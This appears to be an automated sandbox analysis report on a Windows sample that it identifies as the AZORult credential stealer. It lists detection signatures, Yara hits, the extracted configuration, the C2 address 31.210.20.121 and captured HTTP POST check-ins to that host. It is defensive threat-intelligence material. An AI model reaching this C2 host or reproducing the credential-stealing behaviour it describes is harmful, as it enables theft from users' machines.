Loading ...

Play interactive tourEdit tour

Analysis Report gunzipped.exe

Overview

General Information

Sample Name:gunzipped.exe
Analysis ID:396371
MD5:289691163ea5795a930703689eb1b3b9
SHA1:46dc959dc6848a44d6930d00ad2a9e60db08e47b
SHA256:ba5786cfe255f158264fabd0b0cbf90b6f96ddd230a5fe82ca0c551d420f95be
Tags:AZORultexe
Infos:

Most interesting Screenshot:

Detection

AZORult
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected AZORult Info Stealer
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected AntiVM3
Yara detected Azorult
Yara detected Azorult Info Stealer
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file access)
Binary contains a suspicious time stamp
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
Is looking for software installed on the system
May sleep (evasive loops) to hinder dynamic analysis
PE file does not import any functions
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Startup

  • System is w10x64
  • gunzipped.exe (PID: 5624 cmdline: 'C:\Users\user\Desktop\gunzipped.exe' MD5: 289691163EA5795A930703689EB1B3B9)
    • gunzipped.exe (PID: 5472 cmdline: {path} MD5: 289691163EA5795A930703689EB1B3B9)
  • cleanup

Malware Configuration

Threatname: Azorult

{"config: ": ["MachineID :", "EXE_PATH  :", "Screen:", "Layouts:", "LocalTime:", "Computer(Username) :", "Zone:", "[Soft]", "Host: 31.210.20.121\r"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000003.283731822.0000000003C38000.00000004.00000001.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000003.00000003.283052268.00000000033A0000.00000004.00000001.sdmpJoeSecurity_Azorult_1Yara detected AzorultJoe Security
      00000003.00000003.279779219.00000000033C4000.00000004.00000001.sdmpJoeSecurity_Azorult_1Yara detected AzorultJoe Security
        00000003.00000002.283965391.0000000000400000.00000040.00000001.sdmpJoeSecurity_AzorultYara detected Azorult Info StealerJoe Security
          00000003.00000002.283965391.0000000000400000.00000040.00000001.sdmpJoeSecurity_Azorult_1Yara detected AzorultJoe Security
            Click to see the 11 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            3.2.gunzipped.exe.400000.0.unpackJoeSecurity_AzorultYara detected Azorult Info StealerJoe Security
              3.2.gunzipped.exe.400000.0.unpackJoeSecurity_Azorult_1Yara detected AzorultJoe Security
                3.2.gunzipped.exe.400000.0.unpackAzorult_1Azorult Payloadkevoreilly
                • 0x17353:$code1: C7 07 3C 00 00 00 8D 45 80 89 47 04 C7 47 08 20 00 00 00 8D 85 80 FE FF FF 89 47 10 C7 47 14 00 ...
                • 0x1207c:$string1: SELECT DATETIME( ((visits.visit_time/1000000)-11644473600),"unixepoch")
                3.2.gunzipped.exe.400000.0.raw.unpackJoeSecurity_AzorultYara detected Azorult Info StealerJoe Security
                  3.2.gunzipped.exe.400000.0.raw.unpackJoeSecurity_Azorult_1Yara detected AzorultJoe Security
                    Click to see the 7 entries

                    Sigma Overview

                    No Sigma rule has matched

                    Signature Overview

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection:

                    barindex
                    Found malware configurationShow sources
                    Source: gunzipped.exe.5472.3.memstrMalware Configuration Extractor: Azorult {"config: ": ["MachineID :", "EXE_PATH :", "Screen:", "Layouts:", "LocalTime:", "Computer(Username) :", "Zone:", "[Soft]", "Host: 31.210.20.121\r"]}
                    Multi AV Scanner detection for domain / URLShow sources
                    Source: http://31.210.20.121/index.phpVirustotal: Detection: 8%Perma Link
                    Multi AV Scanner detection for submitted fileShow sources
                    Source: gunzipped.exeVirustotal: Detection: 55%Perma Link
                    Source: gunzipped.exeReversingLabs: Detection: 75%
                    Machine Learning detection for sampleShow sources
                    Source: gunzipped.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\Desktop\gunzipped.exeCode function: 3_2_0040A610 CryptUnprotectData,LocalFree,3_2_0040A610
                    Source: gunzipped.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                    Source: C:\Users\user\Desktop\gunzipped.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dllJump to behavior
                    Source: gunzipped.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                    Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: gunzipped.exe, 00000003.00000003.274743641.0000000004128000.00000004.00000001.sdmp, api-ms-win-crt-locale-l1-1-0.dll.3.dr
                    Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: gunzipped.exe, 00000003.00000003.274865988.0000000004150000.00000004.00000001.sdmp, api-ms-win-crt-runtime-l1-1-0.dll.3.dr
                    Source: Binary string: z:\build\build\src\obj-firefox\mozglue\build\mozglue.pdb source: gunzipped.exe, 00000003.00000003.269486087.0000000003728000.00000004.00000001.sdmp, mozglue.dll.3.dr
                    Source: Binary string: z:\build\build\src\obj-firefox\security\nss3.pdb source: gunzipped.exe, 00000003.00000003.275174463.00000000034A0000.00000004.00000001.sdmp, nss3.dll.3.dr
                    Source: Binary string: ucrtbase.pdb source: gunzipped.exe, 00000003.00000003.275174463.00000000034A0000.00000004.00000001.sdmp, ucrtbase.dll.3.dr
                    Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: gunzipped.exe, 00000003.00000003.274290249.0000000004094000.00000004.00000001.sdmp, api-ms-win-core-file-l1-2-0.dll.3.dr
                    Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: gunzipped.exe, 00000003.00000003.274375989.00000000040B0000.00000004.00000001.sdmp, api-ms-win-core-memory-l1-1-0.dll.3.dr
                    Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: gunzipped.exe, 00000003.00000003.269240179.0000000003728000.00000004.00000001.sdmp, freebl3.dll.3.dr
                    Source: Binary string: api-ms-win-core-debug-l1-1-0.pdb source: gunzipped.exe, 00000003.00000003.274208393.0000000004088000.00000004.00000001.sdmp, api-ms-win-core-debug-l1-1-0.dll.3.dr
                    Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: gunzipped.exe, 00000003.00000003.268354039.0000000003728000.00000004.00000001.sdmp, api-ms-win-core-sysinfo-l1-1-0.dll.3.dr
                    Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: gunzipped.exe, 00000003.00000003.274723981.0000000004118000.00000004.00000001.sdmp, api-ms-win-crt-filesystem-l1-1-0.dll.3.dr
                    Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: gunzipped.exe, 00000003.00000003.268805106.0000000003724000.00000004.00000001.sdmp, api-ms-win-crt-stdio-l1-1-0.dll.3.dr
                    Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: gunzipped.exe, 00000003.00000003.274375989.00000000040B0000.00000004.00000001.sdmp, api-ms-win-core-heap-l1-1-0.dll.3.dr
                    Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: gunzipped.exe, 00000003.00000003.274632349.00000000040F4000.00000004.00000001.sdmp, api-ms-win-core-util-l1-1-0.dll.3.dr
                    Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: gunzipped.exe, 00000003.00000003.268332940.0000000003724000.00000004.00000001.sdmp, api-ms-win-core-synch-l1-1-0.dll.3.dr
                    Source: Binary string: vcruntime140.i386.pdbGCTL source: gunzipped.exe, 00000003.00000003.275951863.0000000003708000.00000004.00000001.sdmp, vcruntime140.dll.3.dr
                    Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: gunzipped.exe, 00000003.00000003.282742497.00000000037FC000.00000004.00000001.sdmp, api-ms-win-crt-environment-l1-1-0.dll.3.dr
                    Source: Binary string: z:\build\build\src\obj-firefox\mozglue\build\mozglue.pdb11 source: gunzipped.exe, 00000003.00000003.269486087.0000000003728000.00000004.00000001.sdmp, mozglue.dll.3.dr
                    Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: gunzipped.exe, 00000003.00000003.274290249.0000000004094000.00000004.00000001.sdmp, api-ms-win-core-errorhandling-l1-1-0.dll.3.dr
                    Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: gunzipped.exe, 00000003.00000003.268244527.0000000003724000.00000004.00000001.sdmp, api-ms-win-core-processthreads-l1-1-0.dll.3.dr
                    Source: Binary string: api-ms-win-core-console-l1-1-0.pdb source: gunzipped.exe, 00000003.00000003.282985286.00000000037F8000.00000004.00000001.sdmp, api-ms-win-core-console-l1-1-0.dll.3.dr
                    Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: gunzipped.exe, 00000003.00000003.269240179.0000000003728000.00000004.00000001.sdmp, freebl3.dll.3.dr
                    Source: Binary string: api-ms-win-core-file-l1-1-0.pdb source: gunzipped.exe, 00000003.00000003.267552438.0000000003724000.00000004.00000001.sdmp, api-ms-win-core-file-l1-1-0.dll.3.dr
                    Source: Binary string: api-ms-win-crt-private-l1-1-0.pdb source: gunzipped.exe, 00000003.00000003.274828166.000000000413C000.00000004.00000001.sdmp, api-ms-win-crt-private-l1-1-0.dll.3.dr
                    Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: gunzipped.exe, 00000003.00000003.268528772.0000000003728000.00000004.00000001.sdmp, api-ms-win-crt-convert-l1-1-0.dll.3.dr
                    Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: gunzipped.exe, 00000003.00000003.275174463.00000000034A0000.00000004.00000001.sdmp, softokn3.dll.3.dr
                    Source: Binary string: msvcp140.i386.pdb source: gunzipped.exe, 00000003.00000003.275123945.000000000342C000.00000004.00000001.sdmp, msvcp140.dll.3.dr
                    Source: Binary string: ucrtbase.pdbUGP source: gunzipped.exe, 00000003.00000003.275174463.00000000034A0000.00000004.00000001.sdmp, ucrtbase.dll.3.dr
                    Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: gunzipped.exe, 00000003.00000003.268265315.0000000003724000.00000004.00000001.sdmp, api-ms-win-core-profile-l1-1-0.dll.3.dr
                    Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: gunzipped.exe, 00000003.00000003.274865988.0000000004150000.00000004.00000001.sdmp, api-ms-win-crt-time-l1-1-0.dll.3.dr
                    Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb-- source: gunzipped.exe, 00000003.00000003.274865988.0000000004150000.00000004.00000001.sdmp, nssdbm3.dll.3.dr
                    Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: gunzipped.exe, 00000003.00000003.274290249.0000000004094000.00000004.00000001.sdmp, api-ms-win-core-handle-l1-1-0.dll.3.dr
                    Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: gunzipped.exe, 00000003.00000003.268354039.0000000003728000.00000004.00000001.sdmp, api-ms-win-core-synch-l1-2-0.dll.3.dr
                    Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: gunzipped.exe, 00000003.00000003.282742497.00000000037FC000.00000004.00000001.sdmp, api-ms-win-core-processenvironment-l1-1-0.dll.3.dr
                    Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: gunzipped.exe, 00000003.00000003.274208393.0000000004088000.00000004.00000001.sdmp, api-ms-win-core-datetime-l1-1-0.dll.3.dr
                    Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: gunzipped.exe, 00000003.00000003.268451933.0000000003724000.00000004.00000001.sdmp, api-ms-win-crt-conio-l1-1-0.dll.3.dr
                    Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: gunzipped.exe, 00000003.00000003.274375989.00000000040B0000.00000004.00000001.sdmp, api-ms-win-core-localization-l1-2-0.dll.3.dr
                    Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: gunzipped.exe, 00000003.00000003.274743641.0000000004128000.00000004.00000001.sdmp, api-ms-win-crt-math-l1-1-0.dll.3.dr
                    Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: gunzipped.exe, 00000003.00000003.275174463.00000000034A0000.00000004.00000001.sdmp, softokn3.dll.3.dr
                    Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: gunzipped.exe, 00000003.00000003.274537491.00000000040D8000.00000004.00000001.sdmp, api-ms-win-core-processthreads-l1-1-1.dll.3.dr
                    Source: Binary string: mscorrc.pdb source: gunzipped.exe, 00000001.00000002.262457843.0000000007360000.00000002.00000001.sdmp
                    Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: gunzipped.exe, 00000003.00000003.274375989.00000000040B0000.00000004.00000001.sdmp, api-ms-win-core-namedpipe-l1-1-0.dll.3.dr
                    Source: Binary string: api-ms-win-crt-multibyte-l1-1-0.pdb source: gunzipped.exe, 00000003.00000003.268657790.0000000003728000.00000004.00000001.sdmp, api-ms-win-crt-multibyte-l1-1-0.dll.3.dr
                    Source: Binary string: vcruntime140.i386.pdb source: gunzipped.exe, 00000003.00000003.275951863.0000000003708000.00000004.00000001.sdmp, vcruntime140.dll.3.dr
                    Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: gunzipped.exe, 00000003.00000003.274865988.0000000004150000.00000004.00000001.sdmp, api-ms-win-crt-utility-l1-1-0.dll.3.dr
                    Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: gunzipped.exe, 00000003.00000003.274537491.00000000040D8000.00000004.00000001.sdmp, api-ms-win-core-rtlsupport-l1-1-0.dll.3.dr
                    Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb source: gunzipped.exe, 00000003.00000003.274865988.0000000004150000.00000004.00000001.sdmp, nssdbm3.dll.3.dr
                    Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: gunzipped.exe, 00000003.00000003.274632349.00000000040F4000.00000004.00000001.sdmp, api-ms-win-core-timezone-l1-1-0.dll.3.dr
                    Source: Binary string: msvcp140.i386.pdbGCTL source: gunzipped.exe, 00000003.00000003.275123945.000000000342C000.00000004.00000001.sdmp, msvcp140.dll.3.dr
                    Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: gunzipped.exe, 00000003.00000003.274537491.00000000040D8000.00000004.00000001.sdmp, api-ms-win-core-string-l1-1-0.dll.3.dr
                    Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: gunzipped.exe, 00000003.00000003.274290249.0000000004094000.00000004.00000001.sdmp, api-ms-win-core-file-l2-1-0.dll.3.dr
                    Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: gunzipped.exe, 00000003.00000003.274865988.0000000004150000.00000004.00000001.sdmp, api-ms-win-crt-process-l1-1-0.dll.3.dr
                    Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: gunzipped.exe, 00000003.00000003.274375989.00000000040B0000.00000004.00000001.sdmp, api-ms-win-core-libraryloader-l1-1-0.dll.3.dr
                    Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: gunzipped.exe, 00000003.00000003.274375989.00000000040B0000.00000004.00000001.sdmp, api-ms-win-core-interlocked-l1-1-0.dll.3.dr
                    Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: gunzipped.exe, 00000003.00000003.274723981.0000000004118000.00000004.00000001.sdmp, api-ms-win-crt-heap-l1-1-0.dll.3.dr
                    Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: gunzipped.exe, 00000003.00000003.268805106.0000000003724000.00000004.00000001.sdmp, api-ms-win-crt-string-l1-1-0.dll.3.dr
                    Source: C:\Users\user\Desktop\gunzipped.exeCode function: 3_2_004099C0 FreeLibrary,FindFirstFileW,DeleteFileW,FindNextFileW,SetCurrentDirectoryW,RemoveDirectoryW,3_2_004099C0
                    Source: C:\Users\user\Desktop\gunzipped.exeCode function: 3_2_0040A9E4 FindFirstFileW,FindNextFileW,FindClose,3_2_0040A9E4
                    Source: C:\Users\user\Desktop\gunzipped.exeCode function: 3_2_0040D988 FindFirstFileW,FindFirstFileW,3_2_0040D988
                    Source: C:\Users\user\Desktop\gunzipped.exeCode function: 3_2_00409EF0 FindFirstFileW,GetFileAttributesW,3_2_00409EF0
                    Source: C:\Users\user\Desktop\gunzipped.exeCode function: 3_2_00413030 FindFirstFileW,FindNextFileW,FindClose,3_2_00413030
                    Source: C:\Users\user\Desktop\gunzipped.exeCode function: 3_2_0040A9E3 FindFirstFileW,FindNextFileW,FindClose,3_2_0040A9E3
                    Source: C:\Users\user\Desktop\gunzipped.exeCode function: 3_2_004119A8 FindFirstFileW,FindNextFileW,FindClose,3_2_004119A8
                    Source: C:\Users\user\Desktop\gunzipped.exeCode function: 3_2_004119AC FindFirstFileW,FindNextFileW,FindClose,3_2_004119AC
                    Source: C:\Users\user\Desktop\gunzipped.exeCode function: 3_2_0040DB00 FindFirstFileW,3_2_0040DB00
                    Source: C:\Users\user\Desktop\gunzipped.exeCode function: 3_2_0040DB30 FindFirstFileW,3_2_0040DB30
                    Source: C:\Users\user\Desktop\gunzipped.exeCode function: 3_2_00412D6C FindFirstFileW,FindNextFileW,FindClose,3_2_00412D6C
                    Source: C:\Users\user\Desktop\gunzipped.exeCode function: 3_2_0041160C FindFirstFileW,FindNextFileW,FindClose,3_2_0041160C
                    Source: C:\Users\user\Desktop\gunzipped.exeCode function: 3_2_00413F58 FindFirstFileW,GetFileAttributesW,FindNextFileW,FindClose,3_2_00413F58
                    Source: C:\Users\user\Desktop\gunzipped.exeCode function: 3_2_00409EE8 FindFirstFileW,GetFileAttributesW,3_2_00409EE8
                    Source: C:\Users\user\Desktop\gunzipped.exeCode function: 3_2_00413F58 FindFirstFileW,GetFileAttributesW,FindNextFileW,FindClose,3_2_00413F58

                    Networking:

                    barindex
                    Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                    Source: TrafficSnort IDS: 2029465 ET TROJAN Win32/AZORult V3.2 Client Checkin M15 192.168.2.5:49703 -> 31.210.20.121:80
                    Source: TrafficSnort IDS: 2029140 ET TROJAN AZORult v3.2 Server Response M2 31.210.20.121:80 -> 192.168.2.5:49703
                    C2 URLs / IPs found in malware configurationShow sources
                    Source: Malware configuration extractorURLs: Host: 31.210.20.121
                    Source: Joe Sandbox ViewASN Name: PLUSSERVER-ASN1DE PLUSSERVER-ASN1DE
                    Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Host: 31.210.20.121Content-Length: 105Cache-Control: no-cacheData Raw: 4a 4f ed 3e 32 ed 3e 3c 89 28 39 fe 49 2f fb 38 2f fa 49 4c ed 3e 33 ed 3e 3e ed 3e 3b ed 3e 3e ed 3e 33 ed 3e 3a ed 3e 3d ed 3f 4e 89 28 39 ff 28 39 fd 28 39 fe 28 39 fe 4b 2f fb 3d 4c ed 3f 4e 8a 48 2f fb 38 2f fb 3a 4e ed 3e 3a ed 3e 3e ed 3e 3c ed 3f 4e 8a 28 39 fd 28 39 fc 49 2f fb 3a 48 ed 3e 32 ed 3e 3b 8e Data Ascii: JO>2><(9I/8/IL>3>>>;>>>3>:>=?N(9(9(9(9K/=L?NH/8/:N>:>>><?N(9(9I/:H>2>;
                    Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Host: 31.210.20.121Content-Length: 11117Cache-Control: no-cache
                    Source: C:\Users\user\Desktop\gunzipped.exeCode function: 3_2_00417D84 GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,InternetCrackUrlA,InternetOpenA,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile,InternetCloseHandle,3_2_00417D84
                    Source: unknownHTTP traffic detected: POST /index.php HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Host: 31.210.20.121Content-Length: 105Cache-Control: no-cacheData Raw: 4a 4f ed 3e 32 ed 3e 3c 89 28 39 fe 49 2f fb 38 2f fa 49 4c ed 3e 33 ed 3e 3e ed 3e 3b ed 3e 3e ed 3e 33 ed 3e 3a ed 3e 3d ed 3f 4e 89 28 39 ff 28 39 fd 28 39 fe 28 39 fe 4b 2f fb 3d 4c ed 3f 4e 8a 48 2f fb 38 2f fb 3a 4e ed 3e 3a ed 3e 3e ed 3e 3c ed 3f 4e 8a 28 39 fd 28 39 fc 49 2f fb 3a 48 ed 3e 32 ed 3e 3b 8e Data Ascii: JO>2><(9I/8/IL>3>>>;>>>3>:>=?N(9(9(9(9K/=L?NH/8/:N>:>>><?N(9(9I/:H>2>;
                    Source: gunzipped.exe, 00000003.00000003.283704458.00000000026B0000.00000004.00000001.sdmp, gunzipped.exe, 00000003.00000002.284437491.0000000000C57000.00000004.00000020.sdmpString found in binary or memory: http://31.210.20.121/index.php
                    Source: gunzipped.exe, 00000003.00000002.284563787.0000000000C9D000.00000004.00000020.sdmpString found in binary or memory: http://31.210.20.121/index.phpU)
                    Source: gunzipped.exe, 00000003.00000003.274865988.0000000004150000.00000004.00000001.sdmp, softokn3.dll.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                    Source: gunzipped.exe, 00000003.00000003.274865988.0000000004150000.00000004.00000001.sdmp, softokn3.dll.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
                    Source: gunzipped.exe, 00000003.00000003.274865988.0000000004150000.00000004.00000001.sdmp, softokn3.dll.3.drString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
                    Source: gunzipped.exe, 00000003.00000003.274865988.0000000004150000.00000004.00000001.sdmp, softokn3.dll.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
                    Source: gunzipped.exe, 00000003.00000003.274865988.0000000004150000.00000004.00000001.sdmp, softokn3.dll.3.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
                    Source: gunzipped.exe, 00000003.00000003.274865988.0000000004150000.00000004.00000001.sdmp, softokn3.dll.3.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                    Source: gunzipped.exe, 00000003.00000003.274865988.0000000004150000.00000004.00000001.sdmp, softokn3.dll.3.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
                    Source: gunzipped.exe, 00000001.00000003.238644642.000000000173D000.00000004.00000001.sdmpString found in binary or memory: http://en.w55
                    Source: gunzipped.exe, 00000001.00000002.257287846.0000000005830000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
                    Source: gunzipped.exe, 00000001.00000003.239257578.000000000568B000.00000004.00000001.sdmpString found in binary or memory: http://fontfabrik.coms
                    Source: gunzipped.exeString found in binary or memory: http://ip-api.com/json
                    Source: gunzipped.exe, 00000003.00000003.274865988.0000000004150000.00000004.00000001.sdmp, softokn3.dll.3.drString found in binary or memory: http://ocsp.digicert.com0C
                    Source: gunzipped.exe, 00000003.00000003.274865988.0000000004150000.00000004.00000001.sdmp, softokn3.dll.3.drString found in binary or memory: http://ocsp.digicert.com0N
                    Source: gunzipped.exe, 00000003.00000003.274865988.0000000004150000.00000004.00000001.sdmp, softokn3.dll.3.drString found in binary or memory: http://ocsp.thawte.com0
                    Source: gunzipped.exe, 00000003.00000003.277570895.0000000000CB5000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
                    Source: gunzipped.exe, 00000003.00000003.274865988.0000000004150000.00000004.00000001.sdmp, softokn3.dll.3.drString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
                    Source: gunzipped.exe, 00000003.00000003.274865988.0000000004150000.00000004.00000001.sdmp, softokn3.dll.3.drString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
                    Source: gunzipped.exe, 00000003.00000003.274865988.0000000004150000.00000004.00000001.sdmp, softokn3.dll.3.drString found in binary or memory: http://ts-ocsp.ws.symantec.com07
                    Source: gunzipped.exe, 00000001.00000002.257287846.0000000005830000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                    Source: gunzipped.exe, 00000001.00000003.241762035.0000000005680000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.com=N
                    Source: gunzipped.exe, 00000001.00000002.257287846.0000000005830000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
                    Source: gunzipped.exe, 00000001.00000002.256437881.0000000005670000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
                    Source: gunzipped.exe, 00000001.00000002.257287846.0000000005830000.00000002.00000001.sdmp, gunzipped.exe, 00000001.00000003.245173320.000000000567D000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.244756516.0000000005679000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                    Source: gunzipped.exe, 00000001.00000002.257287846.0000000005830000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                    Source: gunzipped.exe, 00000001.00000002.257287846.0000000005830000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                    Source: gunzipped.exe, 00000001.00000002.257287846.0000000005830000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
                    Source: gunzipped.exe, 00000001.00000002.257287846.0000000005830000.00000002.00000001.sdmp, gunzipped.exe, 00000001.00000003.245173320.000000000567D000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                    Source: gunzipped.exe, 00000001.00000003.244756516.0000000005679000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers=
                    Source: gunzipped.exe, 00000001.00000002.257287846.0000000005830000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                    Source: gunzipped.exe, 00000001.00000002.257287846.0000000005830000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                    Source: gunzipped.exe, 00000001.00000002.256437881.0000000005670000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.como&
                    Source: gunzipped.exe, 00000001.00000002.256437881.0000000005670000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comt
                    Source: gunzipped.exe, 00000001.00000002.257287846.0000000005830000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
                    Source: gunzipped.exe, 00000001.00000003.239022804.000000000568B000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.com&Yy
                    Source: gunzipped.exe, 00000001.00000003.239044619.000000000568B000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.com-u
                    Source: gunzipped.exe, 00000001.00000003.239022804.000000000568B000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.comX
                    Source: gunzipped.exe, 00000001.00000003.239022804.000000000568B000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.comc:Ye
                    Source: gunzipped.exe, 00000001.00000003.239044619.000000000568B000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.comcTY
                    Source: gunzipped.exe, 00000001.00000003.239022804.000000000568B000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.comh
                    Source: gunzipped.exe, 00000001.00000003.239071329.000000000568B000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.comnyY
                    Source: gunzipped.exe, 00000001.00000002.257287846.0000000005830000.00000002.00000001.sdmp, gunzipped.exe, 00000001.00000003.241067654.0000000005674000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                    Source: gunzipped.exe, 00000001.00000003.241067654.0000000005674000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/-t-
                    Source: gunzipped.exe, 00000001.00000002.257287846.0000000005830000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                    Source: gunzipped.exe, 00000001.00000002.257287846.0000000005830000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                    Source: gunzipped.exe, 00000001.00000003.241067654.0000000005674000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cr
